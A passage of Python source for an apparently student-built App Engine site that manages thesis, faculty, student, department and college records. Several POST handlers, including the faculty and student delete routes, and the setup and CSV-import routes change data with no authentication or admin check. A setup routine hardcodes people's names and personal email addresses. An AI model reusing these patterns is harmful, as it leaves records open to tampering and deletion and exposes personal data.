self.redirect('/home')
else:
template_data = {
'email':loggedin_user.email()
}
template = JINJA_ENVIRONMENT.get_template('/pages/register.html')
self.response.write(template.render(template_data))
else:
self.redirect(users.create_login_url('/register'))
def post(self):
user = User(id=users.get_current_user().user_id())
user.phone_number = int(self.request.get('phone_number'))
user.email = self.request.get('email')
user.first_name = self.request.get('first_name')
user.last_name = self.request.get('last_name')
user.is_admin = False
user.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'first_name':user.first_name,
'last_name':user.last_name,
'phone_number':user.phone_number,
'id':users.get_current_user().user_id()
}
}
self.response.out.write(json.dumps(response))
class ThesisPageHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesis.html')
self.response.write(template.render(template_values))
else:
self.redirect('/home')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class FacultyHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
link_text = 'Logout'
template_values = {
'links': links,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/faculty.html')
self.response.write(template.render(template_values))
else:
self.redirect('/home')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self):
faculty = Faculty()
faculty_department_temp = Department.query(Department.department_name == self.request.get('faculty_department'))
faculty_department_temp = faculty_department_temp.get()
faculty_department_key = faculty_department_temp.key
faculty.faculty_title = self.request.get('faculty_title')
faculty.faculty_fname = self.request.get('faculty_fname')
faculty.faculty_sname = self.request.get('faculty_sname')
faculty_full = faculty.faculty_fname + ' ' + faculty.faculty_sname
faculty.faculty_full = faculty_full
faculty.faculty_email = self.request.get('faculty_email')
faculty.faculty_phone = self.request.get('faculty_phone')
faculty.faculty_department = ndb.Key('Department', faculty_department_key.id())
faculty.faculty_bday = self.request.get('faculty_bday')
faculty.key = ndb.Key(Faculty, faculty_full.strip().replace(' ', '').replace('.','').replace(',','').lower())
faculty.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'title':faculty.faculty_title,
'first_name':faculty.faculty_fname,
'last_name':faculty.faculty_sname,
'full_name':faculty.faculty_full,
'email':faculty.faculty_email,
'phone':faculty.faculty_phone,
'bday':faculty.faculty_bday
}
}
self.response.out.write(json.dumps(response))
class StudentHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/student.html')
self.response.write(template.render(template_values))
else:
self.redirect('/home')
else:
self.redirect('/register')
def post(self):
student = Student()
student_department_temp = Department.query(Department.department_name == self.request.get('student_department'))
student_department_temp = student_department_temp.get()
student_department_key = student_department_temp.key
student.student_fname = self.request.get('student_fname')
student.student_sname = self.request.get('student_sname')
student.student_full = student.student_fname + ' ' + student.student_sname
student.student_phone = self.request.get('student_phone')
student.student_email = self.request.get('student_email')
student.student_number = self.request.get('student_number')
student.student_graduated = int(self.request.get('student_graduated'))
student.student_department = ndb.Key('Department', student_department_key.id())
student.student_bday = self.request.get('student_bday')
portions = []
for s in student.student_full.split():
if len(s) > 1 and s not in portions:
portions.append(s)
student.student_name_portions = portions
student.key = ndb.Key(Student, student.student_full.strip().replace(' ', '').replace('.','').replace(',','').lower())
student.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'first_name':student.student_fname,
'last_name':student.student_sname,
'full_name':student.student_full,
'phone':student.student_phone,
'email':student.student_email,
'student_number':student.student_number,
'year_graduated':student.student_graduated
}
}
self.response.out.write(json.dumps(response))
class UniversityHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/university.html')
self.response.write(template.render(template_values))
else:
self.redirect('/home')
else:
self.redirect('/register')
def post(self):
university = University()
university.university_name = self.request.get('university_name')
university.university_initial = self.request.get('university_initial')
university.university_address = self.request.get('university_address')
university.key = ndb.Key(University, university.university_initial.strip().replace(' ', '').replace('.','').replace(',','').lower())
university.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'university_name': university.university_name,
'university_initial': university.university_initial,
'university_address': university.university_address
}
}
self.response.out.write(json.dumps(response))
class CollegeHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/college.html')
self.response.write(template.render(template_values))
else:
self.redirect('/')
else:
self.redirect('/register')
def post(self):
college = College()
college_university_temp = University.query(University.university_name == self.request.get('college_university'))
college_university_temp = college_university_temp.get()
college_university_key = college_university_temp.key
college.college_university = ndb.Key('University', college_university_key.id())
college.college_name = self.request.get('college_name')
college.key = ndb.Key(College, college.college_name.strip().replace(' ', '').replace('.','').replace(',','').lower())
college.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'college_name': college.college_name
}
}
self.response.out.write(json.dumps(response))
class DepartmentHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/department.html')
self.response.write(template.render(template_values))
else:
self.redirect('/')
else:
self.redirect('/register')
def post(self):
department = Department()
department_college_temp = College.query(College.college_name == self.request.get('department_college'))
department_college_temp = department_college_temp.get()
department_college_key = department_college_temp.key
department_chair_temp = Faculty.query(Faculty.faculty_full == self.request.get('department_chair'))
department_chair_temp = department_chair_temp.get()
department_chair_key = department_chair_temp.key
department.department_college = ndb.Key('College', department_college_key.id())
department.department_name = self.request.get('department_name')
department.department_chair = ndb.Key('Faculty', department_chair_key.id())
department.key = ndb.Key(Department, department.department_name.strip().replace(' ', '').replace('.','').replace(',','').lower())
department.put()
college = College.query(College.key == department.department_college)
c = college.get()
logging.info(c)
collegelist = []
collegelist = c.college_departments
logging.info(collegelist)
collegelist.append(department.key)
c.college_departments = collegelist
c.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'department_name': department.department_name
}
}
self.response.out.write(json.dumps(response))
class DataImportHandler(webapp2.RequestHandler):
def get(self):
script_path = os.path.abspath(__file__) # i.e. /path/to/dir/foobar.py
script_dir = os.path.split(script_path)[0] #i.e. /path/to/dir/
rel_path = "data/data.csv"
abs_file_path = os.path.join(script_dir, rel_path)
filepath = open(abs_file_path)
file = csv.reader(filepath)
j = 0
for f in file:
thesis = thesisentry()
thesis.thesis_year = f[3]
thesis.thesis_title = f[4]
thesis.thesis_abstract = f[5]
thesis.thesis_section = f[6]
if len(f[7]) == 0:
f[7] = 'is_empty'
adviser_keyname = f[7].strip().replace(' ', '').replace('.','').replace(',','').lower()
adviser_name = f[7]
thesis_adviser = Faculty.get_by_keyname(adviser_keyname)
if thesis_adviser is None:
thesis_adviser = Faculty(key=ndb.Key(Faculty, adviser_keyname), faculty_full=f[7])
thesis_adviser.put()
thesis.thesis_adviser = thesis_adviser.key
department_name = f[2]
thesis_department = Department.get_by_name(department_name)
if thesis_department is None:
thesis_department = Department(key=ndb.Key(Department, department_name.strip().replace(' ', '').replace('.','').replace(',','').lower()), department_name=department_name)
thesis_department.put()
thesis.thesis_department = thesis_department.key
proponent = []
for i in range(8, 12):
if len(f[i]) is not 0:
proponent.append(f[i])
proponent_list = []
for p in proponent:
thesis_proponent = Student.get_by_name(p)
if thesis_proponent is None:
portions = []
for s in p.split():
if len(s) > 1 and s not in portions:
portions.append(s.lower())
thesis_proponent = Student(key=ndb.Key(Student, p.strip().replace(' ','').replace('.','').replace(',','').lower()), student_full=p, student_name_portions=portions)
thesis_proponent.put()
proponent_list.append(thesis_proponent.key)
thesis.thesis_proponent = proponent_list
tags = []
for t in thesis.thesis_title.split():
if len(t) >= 3 and t not in tags:
tags.append(t.lower())
thesis.thesis_tags = tags
thesis.put()
j += 1
logging.info(j)
filepath.close()
class SetupHandler(webapp2.RequestHandler):
def get(self):
fname = 'Pedrito '
sname = 'Tenerife, Jr.'
title = 'Engr. '
fullname = (fname + sname).strip().replace(' ','').replace('.','').replace(',','').lower()
chairperson = Faculty(key=ndb.Key(Faculty, fullname), faculty_fname=fname, faculty_sname=sname, faculty_title=title, faculty_full=title + fname + sname, faculty_email='jp.resuello07@gmail.com')
chairperson.put()
logging.info(chairperson.key.id())
fname1='Roman Angelo '
sname1='Tria'
title1 ='Engr. '
fullname1 = (fname1 + sname1).strip().replace(' ','').replace('.','').replace(',','').lower()
dbmsprof = Faculty(key=ndb.Key(Faculty, fullname1), faculty_fname=fname1, faculty_sname=sname1, faculty_title=title1, faculty_full=title1 + fname1 + sname1, faculty_email='gino.tr14@gmail.com')
dbmsprof.put()
logging.info(dbmsprof.key.id())
university = University(key=ndb.Key(University, 'pup'), university_name='Polytechnic University of the Philippines',university_address='Sta. Mesa, Manila',university_initial='PUP')
university.put()
college = College(key=ndb.Key(College, 'engineering'), college_name='Engineering', college_university=university.key)
college.put()
department = Department(key=ndb.Key(Department, 'coe'), department_name='COE', department_college=college.key, department_chair=chairperson.key)
department.put()
dept = []
dept.append(department.key)
college.college_departments = dept
college.put()
chairperson.faculty_department = department.key
dbmsprof.faculty_department = department.key
chairperson.put()
dbmsprof.put()
self.redirect('/')
class FacultyListHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/facultylist.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Department'] = {'List':'/department/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/facultylist.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self):
faculty = Faculty()
faculty_department_temp = Department.query(Department.department_name == self.request.get('faculty_department'))
faculty_department_temp = faculty_department_temp.get()
faculty_department_key = faculty_department_temp.key
faculty.faculty_title = self.request.get('faculty_title')
faculty.faculty_fname = self.request.get('faculty_fname')
faculty.faculty_sname = self.request.get('faculty_sname')
faculty_full = faculty.faculty_fname + ' ' + faculty.faculty_sname
faculty.faculty_full = faculty_full
faculty.faculty_email = self.request.get('faculty_email')
faculty.faculty_phone = self.request.get('faculty_phone')
faculty.faculty_department = ndb.Key('Department', faculty_department_key.id())
faculty.faculty_bday = self.request.get('faculty_bday')
faculty.key = ndb.Key(Faculty, faculty_full.strip().replace(' ', '').replace('.','').replace(',','').lower())
faculty.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'title':faculty.faculty_title,
'first_name':faculty.faculty_fname,
'last_name':faculty.faculty_sname,
'full_name':faculty.faculty_full,
'email':faculty.faculty_email,
'phone':faculty.faculty_phone,
'bday':faculty.faculty_bday
}
}
self.response.out.write(json.dumps(response))
class FacultyAPIHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
facultylist = Faculty.query().order(Faculty.created_date).fetch()
faculty = []
for f in facultylist:
faculty.append({
'id':f.key.id(),
'title':f.faculty_title,
'first_name':f.faculty_fname,
'last_name':f.faculty_sname,
'full_name':f.faculty_full,
'email':f.faculty_email,
'phone':f.faculty_phone
})
response = {
'result' : 'OK',
'faculty_data': faculty
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
class ThesisCreateAPI(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
facultylist = Faculty.query().order(Faculty.created_date).fetch()
faculty = []
for f in facultylist:
faculty.append({
'title':f.faculty_title,
'first_name':f.faculty_fname,
'last_name':f.faculty_sname,
'full_name':f.faculty_full,
'email':f.faculty_email,
'phone':f.faculty_phone
})
studentlist = Student.query().order(Student.created_date).fetch()
student = []
for s in studentlist:
student.append({
'first_name':s.student_fname,
'last_name':s.student_sname,
'full_name':s.student_full,
'phone':s.student_phone,
'email':s.student_email,
'student_number':s.student_number,
'year_graduated':s.student_graduated
})
departmentlist = Department.query().order(Department.created_date).fetch()
department = []
for d in departmentlist:
col = College.query(College.key == d.department_college)
c = []
for co in col:
c.append({
'name':co.college_name
})
department.append({
'college':c,
'name':d.department_name
})
response = {
'result' : 'OK',
'faculty_data': faculty,
'student_data': student,
'department_data':department
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
class StudentsAPIHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
studentlist = Student.query().order(Student.created_date).fetch()
student = []
for s in studentlist:
student.append({
'id': s.key.id(),
'first_name':s.student_fname,
'last_name':s.student_sname,
'full_name':s.student_full,
'phone':s.student_phone,
'email':s.student_email,
'student_number':s.student_number,
'year_graduated':s.student_graduated,
'birthday':s.student_bday
})
response = {
'result' : 'OK',
'data': student
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
class StudentListHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
if user.is_admin:
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/studentlist.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Department'] = {'List':'/department/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/studentlist.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class UniversityAPIHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
universitylist = University.query().order(University.created_date).fetch()
university = []
for u in universitylist:
university.append({
'id': u.key.id(),
'university_name': u.university_name,
'university_initial': u.university_initial,
'university_address': u.university_address
})
response = {
'result' : 'OK',
'data': university
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
class UniversityListHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/universitylist.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Departments'] = {'List':'/department/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/universitylist.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class CollegeAPIHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
collegelist = College.query().order(College.created_date).fetch()
college = []
for c in collegelist:
un = University.query(University.key == c.college_university)
un = un.get()
college.append({
'id' : c.key.id(),
'college_name': c.college_name,
'college_university': un.university_name
})
response = {
'result' : 'OK',
'data': college
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
class CollegeListHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/collegelist.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Departments'] = {'List':'/department/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/collegelist.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class DepartmentAPIHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
departmentlist = Department.query().order(Department.created_date).fetch()
dept = []
for d in departmentlist:
c = College.query(College.key == d.department_college)
c = c.get()
# u = University.query(University.key == c.key)
# u = u.get()
f = Faculty.query(Faculty.key == d.department_chair)
f = f.get()
dept.append({
'id':d.key.id(),
# 'department_university':u.university_name,
'department_name': d.department_name,
'department_college': c.college_name,
'department_chair': f.faculty_full
})
response = {
'result' : 'OK',
'data': dept
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
class DepartmentListHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/departmentlist.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Departments'] = {'List':'/department/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/departmentlist.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class FacultyDeleteHandler(webapp2.RequestHandler):
def post(self, id):
faculty = Faculty.get_by_id(id)
faculty.key.delete()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK'
}
self.response.out.write(json.dumps(response))
class FacultyEditHandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
faculty = Faculty.get_by_id(id)
department = None
if faculty.faculty_department is not None:
department = Department.query(Department.key == faculty.faculty_department)
department = department.get()
department = department.department_name
data = {
'links':links,
'item' : faculty,
'dept' : department,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/facultyedit.html')
self.response.write(template.render(data))
else:
self.redirect('/')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self, id):
faculty = Faculty()
faculty_department_temp = Department.query(Department.department_name == self.request.get('faculty_department'))
faculty_department_temp = faculty_department_temp.get()
faculty_department_key = faculty_department_temp.key
faculty.faculty_title = self.request.get('faculty_title')
faculty.faculty_fname = self.request.get('faculty_fname')
faculty.faculty_sname = self.request.get('faculty_sname')
faculty_full = faculty.faculty_fname + ' ' + faculty.faculty_sname
faculty.faculty_full = faculty_full
faculty.faculty_email = self.request.get('faculty_email')
faculty.faculty_phone = self.request.get('faculty_phone')
faculty.faculty_department = ndb.Key('Department', faculty_department_key.id())
faculty.faculty_bday = self.request.get('faculty_bday')
faculty.key = ndb.Key(Faculty, id)
faculty.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'title':faculty.faculty_title,
'first_name':faculty.faculty_fname,
'last_name':faculty.faculty_sname,
'full_name':faculty.faculty_full,
'email':faculty.faculty_email,
'phone':faculty.faculty_phone,
'bday':faculty.faculty_bday
}
}
self.response.out.write(json.dumps(response))
class StudentDeleteHandler(webapp2.RequestHandler):
def post(self, id):
student = Student.get_by_id(id)
student.key.delete()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK'
}
self.response.out.write(json.dumps(response))
class StudentEdithandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
student = Student.get_by_id(id)
department = None
if student.student_department is not None:
department = Department.query(Department.key == student.student_department)
department = department.get()
department = department.department_name
data = {
'links' : links,
'item' : student,
'id':id,
'dept' : department,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/studentedit.html')
self.response.write(template.render(data))
else:
self.redirect('/')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
